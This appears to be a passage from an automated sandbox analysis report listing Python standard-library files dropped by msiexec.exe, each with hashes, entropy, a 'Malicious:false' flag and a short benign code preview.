                                                                                                                                Preview:"""Constants/functions for interpreting results of os.stat() and os.lstat().....Suggested usage: from stat import *.."""....# Indices for stat struct members in the tuple returned by os.stat()....ST_MODE = 0..ST_INO = 1..ST_DEV = 2..ST_NLINK = 3..ST_UID = 4..ST_GID = 5..ST_SIZE = 6..ST_ATIME = 7..ST_MTIME = 8..ST_CTIME = 9....# Extract bits from the mode....def S_IMODE(mode):.. """Return the portion of the file's mode that can be set by.. os.chmod()... """.. return mode & 0o7777....def S_IFMT(mode):.. """Return the portion of the file's mode that describes the.. file type... """.. return mode & 0o170000....# Constants used as S_IFMT() for various file types..# (not all are implemented on all systems)....S_IFDIR = 0o040000 # directory..S_IFCHR = 0o020000 # character device..S_IFBLK = 0o060000 # block device..S_IFREG = 0o100000 # regular file..S_IFIFO = 0o010000 # fifo (named pipe)..S_IFLNK = 0o120000 # symbolic link..S_IFSOCK = 0o140000 # s
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):48949
                                                                                                                                Entropy (8bit):4.816280951968641
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:ezttzGzx06c1cJrWuBj18GkrWIDRMZPTkQkR3uz5zjg1mTH0NGH0xA7fPCl:extqN0jMWuB1RcixQ3ulwmTUkHeAs
                                                                                                                                MD5:EC76C89444F90AAE395EEB1A69190271
                                                                                                                                SHA1:36AAE71210A386CF32E105B3584EB18CFCDF8EE4
                                                                                                                                SHA-256:1EB3FD32F4EE638794C079D478DB80C31015D1D11581728D6D751A84970DB750
                                                                                                                                SHA-512:D2CBA1F53298CF6F7C9588AEBEE5629E3BD5BAF2A8EE885D9DD0B7F95DC9FFA7E157784B424963E3827C40ED89A9409AE587BDB706A6E1A178D2AAD527DDCFF5
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""..Basic statistics module.....This module provides functions for calculating statistics of data, including..averages, variance, and standard deviation.....Calculating averages..--------------------....================== ==================================================..Function Description..================== ==================================================..mean Arithmetic mean (average) of data...fmean Fast, floating point arithmetic mean...geometric_mean Geometric mean of data...harmonic_mean Harmonic mean of data...median Median (middle value) of data...median_low Low median of data...median_high High median of data...median_grouped Median, or 50th percentile, of grouped data...mode Mode (most common value) of data...multimode List of modes (most common values of data)...quantiles Divide data into intervals with equal probability...================== ==
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12095
                                                                                                                                Entropy (8bit):4.463943926280918
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:NeRTSYTE9FuCE3W4Xc7Li9S/j/8RNnGPu+2MZKqhMohlPbokGJ2A7u6VOC:NeRTSYTE9xNPLeS/j/8TG2+2MZKqhMoC
                                                                                                                                MD5:CF6B69E28ED69D22D657E0E5E7DF96CD
                                                                                                                                SHA1:7ECB1B7C4DE06E50A8F2BB9BE720969E0936EE4C
                                                                                                                                SHA-256:C5F415046D856B81BF227A605A410E7A9F250F477A8BA2418689159E2EF4D70B
                                                                                                                                SHA-512:65CF0A923C63AAFBF5952DC09B2B1DBB9E76FB89D0A95EB5194D527917EA3D4D1FE54CEC366F52BC9FC2A555FF64EF6D94CCD1DA78739CB3D4BFA34D7E2A3640
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""A collection of string constants.....Public module variables:....whitespace -- a string containing all ASCII whitespace..ascii_lowercase -- a string containing all ASCII lowercase letters..ascii_uppercase -- a string containing all ASCII uppercase letters..ascii_letters -- a string containing all ASCII letters..digits -- a string containing all ASCII decimal digits..hexdigits -- a string containing all ASCII hexadecimal digits..octdigits -- a string containing all ASCII octal digits..punctuation -- a string containing all ASCII punctuation characters..printable -- a string containing all ASCII characters considered printable...."""....__all__ = ["ascii_letters", "ascii_lowercase", "ascii_uppercase", "capwords",.. "digits", "hexdigits", "octdigits", "printable", "punctuation",.. "whitespace", "Formatter", "Template"]....import _string....# Some strings for ctype-style character classification..whitespace = ' \t\n\r\v\f'..ascii_lowercase = 'abcdefghijklmnopqrstuvwx
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13189
                                                                                                                                Entropy (8bit):4.91396520579551
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:uqbH8M915eiV4fTpjgLPXEj7w6NraVKt+oKVcXRn:uwnMaLPIN+VKtWKn
                                                                                                                                MD5:7A4A0BE66939C3F2E62531A37F6B60E1
                                                                                                                                SHA1:A4E0BE0F314B738F9ACE2698BF5B7910A9B4A1A5
                                                                                                                                SHA-256:FE08A5C09B78E5037F7CCB95B9014C5F4CC2B3968C9001F321D4788E0ADB45EB
                                                                                                                                SHA-512:DF83633E7F827D909426B58AADD9AD5664BAB4787119F005C25A7659E28BC8D2834CAD7B3CF0BE011D3AD6F30129FF724D5C40601ED50B9F4C94B2635875B226
                                                                                                                                Malicious:false
                                                                                                                                Preview:# This file is generated by mkstringprep.py. DO NOT EDIT..."""Library that exposes various tables found in the StringPrep RFC 3454.....There are two kinds of tables: sets, for which a member test is provided,..and mappings, for which a mapping function is provided..."""....from unicodedata import ucd_3_2_0 as unicodedata....assert unicodedata.unidata_version == '3.2.0'....def in_table_a1(code):.. if unicodedata.category(code) != 'Cn': return False.. c = ord(code).. if 0xFDD0 <= c < 0xFDF0: return False.. return (c & 0xFFFF) not in (0xFFFE, 0xFFFF)......b1_set = set([173, 847, 6150, 6155, 6156, 6157, 8203, 8204, 8205, 8288, 65279] + list(range(65024,65040)))..def in_table_b1(code):.. return ord(code) in b1_set......b3_exceptions = {..0xb5:'\u03bc', 0xdf:'ss', 0x130:'i\u0307', 0x149:'\u02bcn',..0x17f:'s', 0x1f0:'j\u030c', 0x345:'\u03b9', 0x37a:' \u03b9',..0x390:'\u03b9\u0308\u0301', 0x3b0:'\u03c5\u0308\u0301', 0x3c2:'\u03c3', 0x3d0:'\u03b2',..0x3d1:'\u03b8', 0x3d2:'\u03c5'
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):272
                                                                                                                                Entropy (8bit):4.3743352648582725
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:UoPb5ThvOC3hvOuFimWA7la//1SITIFIjrWVZFIpdOv:UoDhECUno7YlSIEFIfWV7IpdA
                                                                                                                                MD5:5B6FAB07BA094054E76C7926315C12DB
                                                                                                                                SHA1:74C5B714160559E571A11EA74FEB520B38231BC9
                                                                                                                                SHA-256:EADBCC540C3B6496E52449E712ECA3694E31E1D935AF0F1E26CFF0E3CC370945
                                                                                                                                SHA-512:2846E8C449479B1C64D39117019609E5A6EA8030220CAC7B5EC6B4090C9AA7156ED5FCD5E54D7175A461CD0D58BA1655757049B0BCE404800BA70A2F1E12F78C
                                                                                                                                Malicious:false
                                                                                                                                Preview:__all__ = [.. # Functions.. 'calcsize', 'pack', 'pack_into', 'unpack', 'unpack_from',.. 'iter_unpack',.... # Classes.. 'Struct',.... # Exceptions.. 'error'.. ]....from _struct import *..from _struct import _clearcache..from _struct import __doc__..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):87787
                                                                                                                                Entropy (8bit):4.264496296020966
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:aK7t9c+p5IyXr8FML10kq79iXochlqYI5a3pfZ5KL6Wv090Gj5hfqoHnADZ0Mv20:aK7t++p5IyXr8aL1FiOM
                                                                                                                                MD5:4851086607B190EB190786DAF59AC763
                                                                                                                                SHA1:BE6FF73B6A7E4796598F7437711859DB8987C61F
                                                                                                                                SHA-256:517A8E1D2DACF7D75353361AD672A5A9EF9E03F7EE952613887C8BEDADAF5F59
                                                                                                                                SHA-512:582CC7770646F4AE524CEF85B18569CAADEB28F47A703DA3598ED0A65C9906C1F2A13782CBDEAA4755AB4F196D8905938CF284538E69CD71E915B3627F3E1693
                                                                                                                                Malicious:false
                                                                                                                                Preview:# subprocess - Subprocesses with accessible I/O streams..#..# For more information about this module, see PEP 324...#..# Copyright (c) 2003-2005 by Peter Astrand <astrand@lysator.liu.se>..#..# Licensed to PSF under a Contributor Agreement.....r"""Subprocesses with accessible I/O streams....This module allows you to spawn processes, connect to their..input/output/error pipes, and obtain their return codes.....For a complete description of this module see the Python documentation.....Main API..========..run(...): Runs a command, waits for it to complete, then returns a.. CompletedProcess instance...Popen(...): A class for flexibly executing a command in a new process....Constants..---------..DEVNULL: Special value that indicates that os.devnull should be used..PIPE: Special value that indicates a pipe should be created..STDOUT: Special value that indicates that stderr should go to stdout......Older API..=========..call(...): Runs a command, waits for it to complete, then ret
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):19013
                                                                                                                                Entropy (8bit):4.555103860687915
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:xoVIiMydyelw/k/TyMRDyzlDGgGoBVb/yY/BFex0lAvv/yCyg+YdM0ccoeUPG:xojMUyey/xQloreY/exMAvSXWoK
                                                                                                                                MD5:8480BB4F0BD7068BEEB6F2A1A72AE6DB
                                                                                                                                SHA1:67C458764F9EFEC035A97FBA9211E659A491129A
                                                                                                                                SHA-256:B13C16DE7EEADBD87493ACB0BC7F40A9357AA4D778802B63263DA243E5B7E1F5
                                                                                                                                SHA-512:522F0DF41FE7A3A9CD2F4C5C452C29EB460F0FEA770315249FDDF06F8B345F4791C77073C207A26670B1830731ED3F0E5FD61A5C6F53E47546A9F299BC5C52A6
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Stuff to parse Sun and NeXT audio files.....An audio file consists of a header followed by the data. The structure..of the header is as follows..... +---------------+.. | magic word |.. +---------------+.. | header size |.. +---------------+.. | data size |.. +---------------+.. | encoding |.. +---------------+.. | sample rate |.. +---------------+.. | # of channels |.. +---------------+.. | info |.. | |.. +---------------+....The magic word consists of the 4 characters '.snd'. Apart from the..info field, all header fields are 4 bytes in size. They are all..32-bit unsigned integers encoded in big-endian byte order.....The header size really gives the start of the data...The data size is the physical size of the data. From the other..parameters the number of frames can be calculated...The encoding gives the way in which audio sampl
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10694
                                                                                                                                Entropy (8bit):4.551768604989663
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:t+Ra9lA8SLJMqIQ6Eddu1HgjotSAKgepU880:GL8SLJ3IQ6E3cNKgepU0
                                                                                                                                MD5:0910DCA02D33B504AD9DFB8C8954B136
                                                                                                                                SHA1:DEBAE88BB24A852956A31C51F982F1359FEF2B52
                                                                                                                                SHA-256:D2B836DE41365799CCE69D9A4370B8BFA27B2C3170342D768FE6D46DDE5B8600
                                                                                                                                SHA-512:115DF8E6361EA858F59DC0A93B1C714304C10CE23CFF883A6D043C247232A732520D278B3DFAB421D06D188B0C7044B988406CF71B7B2019C4193A47F9D6A25C
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Interface to the compiler's internal symbol tables"""....import _symtable..from _symtable import (USE, DEF_GLOBAL, DEF_NONLOCAL, DEF_LOCAL, DEF_PARAM,.. DEF_IMPORT, DEF_BOUND, DEF_ANNOT, SCOPE_OFF, SCOPE_MASK, FREE,.. LOCAL, GLOBAL_IMPLICIT, GLOBAL_EXPLICIT, CELL)....import weakref....__all__ = ["symtable", "SymbolTable", "Class", "Function", "Symbol"]....def symtable(code, filename, compile_type):.. """ Return the toplevel *SymbolTable* for the source code..... *filename* is the name of the file with the code.. and *compile_type* is the *compile()* mode argument... """.. top = _symtable.symtable(code, filename, compile_type).. return _newSymbolTable(top, filename)....class SymbolTableFactory:.. def __init__(self):.. self.__memo = weakref.WeakValueDictionary().... def new(self, table, filename):.. if table.type == _symtable.TYPE_FUNCTION:.. return Function(table, filename).. if table.type == _symtable.TYPE_CLASS:..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):31166
                                                                                                                                Entropy (8bit):4.809540541324277
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:3cjlzn1Q7WkxFfRw2GTULbA+vRaZc3lPdmOq61uc7g:3SzlkxFfSGvVPdTR7g
                                                                                                                                MD5:9654AD62A1C369519066182E68244F43
                                                                                                                                SHA1:3FE32528690DCE1CA7CE61418C4A5AD582B74D39
                                                                                                                                SHA-256:7A4778F7124F839C2314E2ECE29B867B190EDE5A1D4C3A571F0DAE722B596AE3
                                                                                                                                SHA-512:B4DC58345B2166633E24530E5608DF568965D2D864E9E4AF2DECA6B9C7B47CE78B4891B942154E67D2BBD09DC8ED2CFB22A753F2BA43BCEAD3BF388BAC779CF4
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Access to Python's configuration information."""....import os..import sys..from os.path import pardir, realpath....__all__ = [.. 'get_config_h_filename',.. 'get_config_var',.. 'get_config_vars',.. 'get_makefile_filename',.. 'get_path',.. 'get_path_names',.. 'get_paths',.. 'get_platform',.. 'get_python_version',.. 'get_scheme_names',.. 'parse_config_h',..]....# Keys for get_config_var() that are never converted to Python integers..._ALWAYS_STR = {.. 'MACOSX_DEPLOYMENT_TARGET',..}...._INSTALL_SCHEMES = {.. 'posix_prefix': {.. 'stdlib': '{installed_base}/{platlibdir}/python{py_version_short}',.. 'platstdlib': '{platbase}/{platlibdir}/python{py_version_short}',.. 'purelib': '{base}/lib/python{py_version_short}/site-packages',.. 'platlib': '{platbase}/{platlibdir}/python{py_version_short}/site-packages',.. 'include':.. '{installed_base}/include/python{py_version_short}{abiflags}',.. 'platinclude':
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11741
                                                                                                                                Entropy (8bit):4.483192026136015
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:2Ptt0Ds5MiaVbSI5LmOLNzFhFI9NSHvc4n4+FAhBhNSkpyPqP1P+FMC6nMqx0:1A5M9lNBLNzFhFIjSHvc4n4+FAhFJ0Pn
                                                                                                                                MD5:FB9DD7D4F4FD1CA42A720D00A3846F1B
                                                                                                                                SHA1:E46724B0441E8AD9DF27272209B6415BCBC80334
                                                                                                                                SHA-256:DBC890D5225EF5DA0E1346D22FF31236B362A34E81F4CAF59239A0059B0A864F
                                                                                                                                SHA-512:E29A672C93127635CC211112A9C61A13219D03A1910AA5EA8F6CBC1CAA18F98026C1E9392A03A51133B5F10CEF073AC61370EAFB04CA0E7224BD3A62E90E2AFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""The Tab Nanny despises ambiguous indentation. She knows no mercy.....tabnanny -- Detection of ambiguous indentation....For the time being this module is intended to be called as a script...However it is possible to import it into an IDE and use the function..check() described below.....Warning: The API provided by this module is likely to change in future..releases; such changes may not be backward compatible..."""....# Released to the public domain, by Tim Peters, 15 April 1998.....# XXX Note: this is now a standard library module...# XXX The API needs to undergo changes however; the current code is too..# XXX script-like. This will be addressed later.....__version__ = "6"....import os..import sys..import tokenize..if not hasattr(tokenize, 'NL'):.. raise ValueError("tokenize.NL doesn't exist -- tokenize module too old")....__all__ = ["check", "NannyNag", "process_tokens"]....verbose = 0..filename_only = 0....def errprint(*args):.. sep = "".. fo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):98564
                                                                                                                                Entropy (8bit):4.493256138233893
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:AemBoIoCvKP1bdtZdRcPe4Z1PEJAsI28bVqMLsiz+yG+4:mBoIyP1ZtT2P4I28b7Lsizjp4
                                                                                                                                MD5:8CB5D786EB655549392C4577FCAAE54F
                                                                                                                                SHA1:330BC092217094430C2411EBA1BBF1CF09F16B1A
                                                                                                                                SHA-256:74CA13F7A5E12D056D72FCB9CE89D21AF668F7D45AD1351634C93C630A6A15A9
                                                                                                                                SHA-512:F0C3B76AF0BA18F9D65C17E4E7D3CFF70C82C8ACB526E139F74398484331A54CD57CCD0C7AB04D1E842BD43627D6FD1F258D43E251E29B8CD67002F2B8056BC5
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3..#-------------------------------------------------------------------..# tarfile.py..#-------------------------------------------------------------------..# Copyright (C) 2002 Lars Gustaebel <lars@gustaebel.de>..# All rights reserved...#..# Permission is hereby granted, free of charge, to any person..# obtaining a copy of this software and associated documentation..# files (the "Software"), to deal in the Software without..# restriction, including without limitation the rights to use,..# copy, modify, merge, publish, distribute, sublicense, and/or sell..# copies of the Software, and to permit persons to whom the..# Software is furnished to do so, subject to the following..# conditions:..#..# The above copyright notice and this permission notice shall be..# included in all copies or substantial portions of the Software...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDI
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23980
                                                                                                                                Entropy (8bit):4.518460142420019
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:DyP08SF0rbykUKUIVl0RPB5Z9FrpvPsgeNTKOX2A4bVWVn:WDSF0rukgI70RPB5Z9FrpvPsjNTKw
                                                                                                                                MD5:2ED09F7EE2E1E01E25270207FEC33857
                                                                                                                                SHA1:24A7D962D4AF64836EA270D475A2D00EA80E874F
                                                                                                                                SHA-256:F04B318096FCAC0D033AD6B07737CEFF5B101EC2BF3EDA87CFDC37175F8C96ED
                                                                                                                                SHA-512:9F81485F65E0069B9D71B81CAD07231F78F665A12D81E7F41517A59274467134A97D72662E2D9DFF5E0BD9FBBBBE158519E4494D61625A8545DC9B5A2154A9E4
                                                                                                                                Malicious:false
                                                                                                                                Preview:r"""TELNET client class.....Based on RFC 854: TELNET Protocol Specification, by J. Postel and..J. Reynolds....Example:....>>> from telnetlib import Telnet..>>> tn = Telnet('www.python.org', 79) # connect to finger port..>>> tn.write(b'guido\r\n')..>>> print(tn.read_all())..Login Name TTY Idle When Where..guido Guido van Rossum pts/2 <Dec 2 11:10> snag.cnri.reston......>>>....Note that read_all() won't read until eof -- it just reads some data..-- but it guarantees to read at least one byte unless EOF is hit.....It is possible to pass a Telnet object to a selector in order to wait until..more data is available. Note that in this case, read_eager() may return b''..even if there was data on the socket, because the protocol negotiation may have..eaten the data. This is why EOFError is needed in some cases to distinguish..between "no data" and "connection closed" (since the socket also appears ready..for reading when it is closed).....To
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):31019
                                                                                                                                Entropy (8bit):4.458654081973482
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:BNed/ue7EK/MBSxddEMDprcpdkddEJJS73f9fv1+i+lZsLr:bed/uYE6M0xbEMDpopEuJJShfv3PLr
                                                                                                                                MD5:21E2D83FFFAAD48806985FA28BCECE55
                                                                                                                                SHA1:1A14A7B37F5260240EC8E20CCED48603EFB1B288
                                                                                                                                SHA-256:130F717F7787A52064572F3138EF204F2BE65773B831C947B4960B84359480B6
                                                                                                                                SHA-512:C932C16A618986E83F319E6D37E18BE194AC5F7A03BA6EEAA570682724F31C12945F0A642CCA99597DA253A1BA4AF73BF5A5052EF5FD307B7495D19A4D6AAA78
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Temporary files.....This module provides generic, low- and high-level interfaces for..creating temporary files and directories. All of the interfaces..provided by this module can be used without fear of race conditions..except for 'mktemp'. 'mktemp' is subject to race conditions and..should not be used; it is provided for backward compatibility only.....The default path names are returned as str. If you supply bytes as..input, all return values will be in bytes. Ex:.... >>> tempfile.mkstemp().. (4, '/tmp/tmptpu9nin8').. >>> tempfile.mkdtemp(suffix=b'').. b'/tmp/tmppbi8f0hy'....This module also provides some data items to the user:.... TMP_MAX - maximum number of names that will be tried before.. giving up... tempdir - If this is set to a string before the first use of.. any routine from this module, it will be considered as.. another candidate location to store temporary files..."""....__all__ = [.. "NamedTemporaryFile", "Te
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20209
                                                                                                                                Entropy (8bit):4.447873689358886
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:6jY1j/VIYzSu/AdorlSNMNt/KhV0q1uJN7J6CJap:6jY1j/bDAdWFOUNcC0p
                                                                                                                                MD5:66ED8AD42ECE95E40E68ED807E3A4053
                                                                                                                                SHA1:BD353F9EF3EA6D4CC510FC14F9A681F8F54C4CE6
                                                                                                                                SHA-256:CAD00069B2A25A585604D2FA774C288CF5ED70D4464AFAC16EDF821F3A4AFD5F
                                                                                                                                SHA-512:BBC4377CF3FC0B84694626D158CA969A2E4AB8B1C9A0CA778C6589362D804573A3B95031B30616D393F536D8CB13DBE1567ED084931A2619D83DD570107851AD
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Text wrapping and filling..."""....# Copyright (C) 1999-2001 Gregory P. Ward...# Copyright (C) 2002, 2003 Python Software Foundation...# Written by Greg Ward <gward@python.net>....import re....__all__ = ['TextWrapper', 'wrap', 'fill', 'dedent', 'indent', 'shorten']....# Hardcode the recognized whitespace characters to the US-ASCII..# whitespace characters. The main reason for doing this is that..# some Unicode spaces (like \u00a0) are non-breaking whitespaces..._whitespace = '\t\n\x0b\x0c\r '....class TextWrapper:.. """.. Object for wrapping/filling text. The public interface consists of.. the wrap() and fill() methods; the other methods are just there for.. subclasses to override in order to tweak the default behaviour... If you want to completely replace the main wrapping algorithm,.. you'll probably have to override _wrap_chunks()..... Several instance attributes control various aspects of wrapping:.. width (default: 70).. the maximum width of w
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1031
                                                                                                                                Entropy (8bit):4.7762509461988625
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:b9G79+7q737Kv7Vm7QXUJRfDDFWnLmjoOLSFDuCSy176Pff2fdgmsG0Fm:k79+7q737s7A7QXG93COWVB76HsdnsGx
                                                                                                                                MD5:92F4A7B0A22F593C8BDF429CAC3D4589
                                                                                                                                SHA1:958CCB19110A69ED6595B5F16C768CA73A85C469
                                                                                                                                SHA-256:5A89B1A1F22384960E69C554633A98558231F11A48260952EBFC21CA10F0625C
                                                                                                                                SHA-512:2E0A0118BE0F4B309E6286E8015FFE0885181A77B485BA39E528638757D59ADB2F15F9F2ACC04DE31794357556DD5CC622EC8D6526604CE6F3F8520C2B64D925
                                                                                                                                Malicious:false
                                                                                                                                Preview:s = """Gur Mra bs Clguba, ol Gvz Crgref....Ornhgvshy vf orggre guna htyl...Rkcyvpvg vf orggre guna vzcyvpvg...Fvzcyr vf orggre guna pbzcyrk...Pbzcyrk vf orggre guna pbzcyvpngrq...Syng vf orggre guna arfgrq...Fcnefr vf orggre guna qrafr...Ernqnovyvgl pbhagf...Fcrpvny pnfrf nera'g fcrpvny rabhtu gb oernx gur ehyrf...Nygubhtu cenpgvpnyvgl orngf chevgl...Reebef fubhyq arire cnff fvyragyl...Hayrff rkcyvpvgyl fvyraprq...Va gur snpr bs nzovthvgl, ershfr gur grzcgngvba gb thrff...Gurer fubhyq or bar-- naq cersrenoyl bayl bar --boivbhf jnl gb qb vg...Nygubhtu gung jnl znl abg or boivbhf ng svefg hayrff lbh'er Qhgpu...Abj vf orggre guna arire...Nygubhtu arire vf bsgra orggre guna *evtug* abj...Vs gur vzcyrzragngvba vf uneq gb rkcynva, vg'f n onq vqrn...Vs gur vzcyrzragngvba vf rnfl gb rkcynva, vg znl or n tbbq vqrn...Anzrfcnprf ner bar ubaxvat terng vqrn -- yrg'f qb zber bs gubfr!"""....d = {}..for c in (65, 97):.. for i in range(26):.. d[chr(i+c)] = chr((i+13) % 26 + c)....print("".jo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):59479
                                                                                                                                Entropy (8bit):4.419516197697222
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:2M81+KmC/gEGUXWyLOSp2I2kIy/fZtTinkKUd9aKJEi4OoOuTWJAkId6py5UwW9D:2bF6mz2m5DKg9dElO7IW+PdW97nX
                                                                                                                                MD5:F7FED8605142CBD193B37726970665F2
                                                                                                                                SHA1:01C9995E4D516BDBEEDD9682FF59D25EEB2ADD08
                                                                                                                                SHA-256:2C886AD38C75A1C7060FCF40BA60857BA5DB4037BCFB5B190160A9F3CC4086F5
                                                                                                                                SHA-512:FA70035F27AE3405F33A6C074C7BC268A9F0A03F00F6B95C96E7E5DBC1980D15C556345903BB1C16290975CE020D2E2ADC279E24F6CBB525E3F91BA6EAFCF441
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Thread module emulating a subset of Java's threading model."""....import os as _os..import sys as _sys..import _thread..import functools....from time import monotonic as _time..from _weakrefset import WeakSet..from itertools import islice as _islice, count as _count..try:.. from _collections import deque as _deque..except ImportError:.. from collections import deque as _deque....# Note regarding PEP 8 compliant names..# This threading model was originally inspired by Java, and inherited..# the convention of camelCase function and method names from that..# language. Those original names are not in any imminent danger of..# being deprecated (even for Py3k),so this module provides them as an..# alias for the PEP 8 compliant names..# Note that using the new PEP 8 compliant names facilitates substitution..# with the multiprocessing module, which doesn't provide the old..# Java inspired names.....__all__ = ['get_ident', 'active_count', 'Condition', 'current_thread',.. 'en
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13871
                                                                                                                                Entropy (8bit):4.371086714933462
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:NSkzurY2n/UbxSni/eR9ETCWxFXCfs+8YXIHKutPPTJJeXXqJ79UE/J6MWZVkgj2:cLWbxii/kc/fXcsrHKut3TKXX296NZVI
                                                                                                                                MD5:C6203F7BB9ECE6B3D3289A2E9BE08D6C
                                                                                                                                SHA1:DF6A867CD0FB08947ACFB3939BA815B0E48DAA6D
                                                                                                                                SHA-256:2632615C935A02D88636E5587955240CFD76D5DCCADC570719C3346E61D78182
                                                                                                                                SHA-512:6CB49B882E7AD272C2AD0F852CDFEA0E01D458FBCCEAC1C279BA7D036F614B781C1607C49A788D635B92734B103D28446FA51E3E3A8CF4734BE06325F8DF59F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""Tool for measuring execution time of small code snippets.....This module avoids a number of common traps for measuring execution..times. See also Tim Peters' introduction to the Algorithms chapter in..the Python Cookbook, published by O'Reilly.....Library usage: see the Timer class.....Command line usage:.. python timeit.py [-n N] [-r N] [-s S] [-p] [-h] [--] [statement]....Options:.. -n/--number N: how many times to execute 'statement' (default: see below).. -r/--repeat N: how many times to repeat the timer (default 5).. -s/--setup S: statement to be executed once initially (default 'pass')... Execution time of this setup statement is NOT timed... -p/--process: use time.process_time() (default is time.perf_counter()).. -v/--verbose: print raw timing results; repeat for more digits precision.. -u/--unit: set the output time unit (nsec, usec, msec, or sec).. -h/--help: print this usage message and exit.. --: separate options from
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2523
                                                                                                                                Entropy (8bit):5.200512889670289
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:JlLcdqen2WIMekwDqkJVZuR4APJ4BUhCla9frYqR6FCgLzqUVndcELod:Tc/2xMeJJIhOGhsa9zgvzqUVn+Ew
                                                                                                                                MD5:AA65A2487B85B91AB92597D0AB01B3DB
                                                                                                                                SHA1:EFAB12AABDF40AE7C127678A4E398A0D8D7333C7
                                                                                                                                SHA-256:DEEF9E816F02D761501BB6E28870B204E2341D39D3D5D0131F5853781CBF2C0E
                                                                                                                                SHA-512:107CBAFEE254F31530768507318616CC177F014E84D4AC37280E5054AF94E70BCC3D578EBB608FCBBFE91211B8E6F4B5CC13C6E470736916101B2607912AB6DB
                                                                                                                                Malicious:false
